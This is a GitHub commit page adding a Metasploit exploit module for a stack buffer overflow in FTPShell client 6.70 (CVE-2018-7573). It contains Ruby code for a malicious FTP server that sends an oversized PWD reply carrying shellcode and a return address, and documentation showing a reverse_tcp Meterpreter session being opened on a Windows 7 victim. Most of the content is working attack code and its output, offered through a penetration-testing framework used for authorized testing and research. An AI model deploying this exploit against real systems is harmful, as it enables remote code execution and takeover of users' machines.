-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #10213, Add FTPShell client 6.70 Stack Buffer Overflow exploit
- Loading branch information
1 parent
fd7ea51
commit 9bed9f0
Showing
2 changed files
with
157 additions
and
0 deletions.
There are no files selected for viewing
54 changes: 54 additions & 0 deletions
54
documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
## Vulnerable Application | ||
|
||
FTPShell client 6.70 (Enterprise edition) is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code on the target. The vulnerability is caused by improper bounds checking of the PWD command. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [ftpshell.com](http://www.ftpshell.com/downloadclient.htm). | ||
|
||
## Verification Steps | ||
1. Install a vulnerable FTPShell client 6.70 | ||
2. Start `msfconsole` | ||
3. Do `use exploit/windows/ftp/ftpshell_cli_bof` | ||
4. Do `set PAYLOAD windows/meterpreter/reverse_tcp` | ||
5. Do `set LHOST ip` | ||
6. Do `exploit` | ||
7. Conect to the FTP server using FTPShell client 6.70 | ||
8. Verify the Meterpreter session is opened | ||
|
||
## Scenarios | ||
|
||
### FTPShell client 6.70 on Windows 7 SP1 x64 | ||
|
||
``` | ||
msf > use exploit/windows/ftp/ftpshell_cli_bof | ||
msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp | ||
PAYLOAD => windows/meterpreter/reverse_tcp | ||
msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129 | ||
LHOST => 172.16.106.129 | ||
msf exploit(windows/ftp/ftpshell_cli_bof) > exploit | ||
[*] Exploit running as background job 0. | ||
[*] Started reverse TCP handler on 172.16.106.129:4444 | ||
[*] Please ask your target(s) to connect to 172.16.106.129:21 | ||
[*] Server started. | ||
msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected. | ||
[*] 172.16.106.128 - Response: Sending 220 Welcome | ||
[*] 172.16.106.128 - Request: USER anonymous | ||
[*] 172.16.106.128 - Response: sending 331 OK | ||
[*] 172.16.106.128 - Request: PASS anonymous@anon.com | ||
[*] 172.16.106.128 - Response: Sending 230 OK | ||
[*] 172.16.106.128 - Request: PWD | ||
[*] 172.16.106.128 - Request: Sending the malicious response | ||
[*] Sending stage (179779 bytes) to 172.16.106.128 | ||
[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400 | ||
msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1 | ||
[*] Starting interaction with 1... | ||
meterpreter > sysinfo | ||
Computer : PC | ||
OS : Windows 7 (Build 7601, Service Pack 1). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 1 | ||
Meterpreter : x86/windows | ||
meterpreter > | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,103 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = NormalRanking | ||
|
||
include Msf::Exploit::Remote::TcpServer | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise | ||
edition) allowing remote code execution. | ||
}, | ||
'Author' => | ||
[ | ||
'r4wd3r', # Original exploit author | ||
'Daniel Teixeira' # MSF module author | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'CVE', '2018-7573'], | ||
[ 'EDB', '44596' ] | ||
], | ||
'Payload' => | ||
{ | ||
'Space' => 400, | ||
'BadChars' => "\x00\x22\x0d\x0a\x0b" | ||
}, | ||
'Platform' => 'win', | ||
'Targets' => | ||
[ | ||
# CALL ESI in FTPShell.exe : 0x00452eed | ||
[ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ] | ||
], | ||
'Privileged' => false, | ||
'DefaultOptions' => | ||
{ | ||
'SRVHOST' => '0.0.0.0', | ||
'EXITFUNC' => 'thread' | ||
}, | ||
'DisclosureDate' => 'Mar 4 2017', | ||
'DefaultTarget' => 0)) | ||
|
||
register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ] | ||
end | ||
|
||
def exploit | ||
srv_ip_for_client = datastore['SRVHOST'] | ||
if srv_ip_for_client == '0.0.0.0' | ||
if datastore['LHOST'] | ||
srv_ip_for_client = datastore['LHOST'] | ||
else | ||
srv_ip_for_client = Rex::Socket.source_address('50.50.50.50') | ||
end | ||
end | ||
|
||
srv_port = datastore['SRVPORT'] | ||
|
||
print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}") | ||
super | ||
end | ||
|
||
def on_client_connect(client) | ||
p = regenerate_payload(client) | ||
return if p.nil? | ||
print_status("#{client.peerhost} - connected.") | ||
|
||
res = client.get_once.to_s.strip | ||
print_status("#{client.peerhost} - Request: #{res}") unless res.empty? | ||
print_status("#{client.peerhost} - Response: Sending 220 Welcome") | ||
welcome = "220 Welcome.\r\n" | ||
client.put(welcome) | ||
|
||
res = client.get_once.to_s.strip | ||
print_status("#{client.peerhost} - Request: #{res}") | ||
print_status("#{client.peerhost} - Response: sending 331 OK") | ||
user = "331 OK.\r\n" | ||
client.put(user) | ||
|
||
res = client.get_once.to_s.strip | ||
print_status("#{client.peerhost} - Request: #{res}") | ||
print_status("#{client.peerhost} - Response: Sending 230 OK") | ||
pass = "230 OK.\r\n" | ||
client.put(pass) | ||
res = client.get_once.to_s.strip | ||
print_status("#{client.peerhost} - Request: #{res}") | ||
|
||
sploit = '220 "' | ||
sploit << payload.encoded | ||
sploit << "\x20" * (payload_space - payload.encoded.length) | ||
sploit << target.ret | ||
sploit << "\" is current directory\r\n" | ||
|
||
print_status("#{client.peerhost} - Request: Sending the malicious response") | ||
client.put(sploit) | ||
|
||
end | ||
end |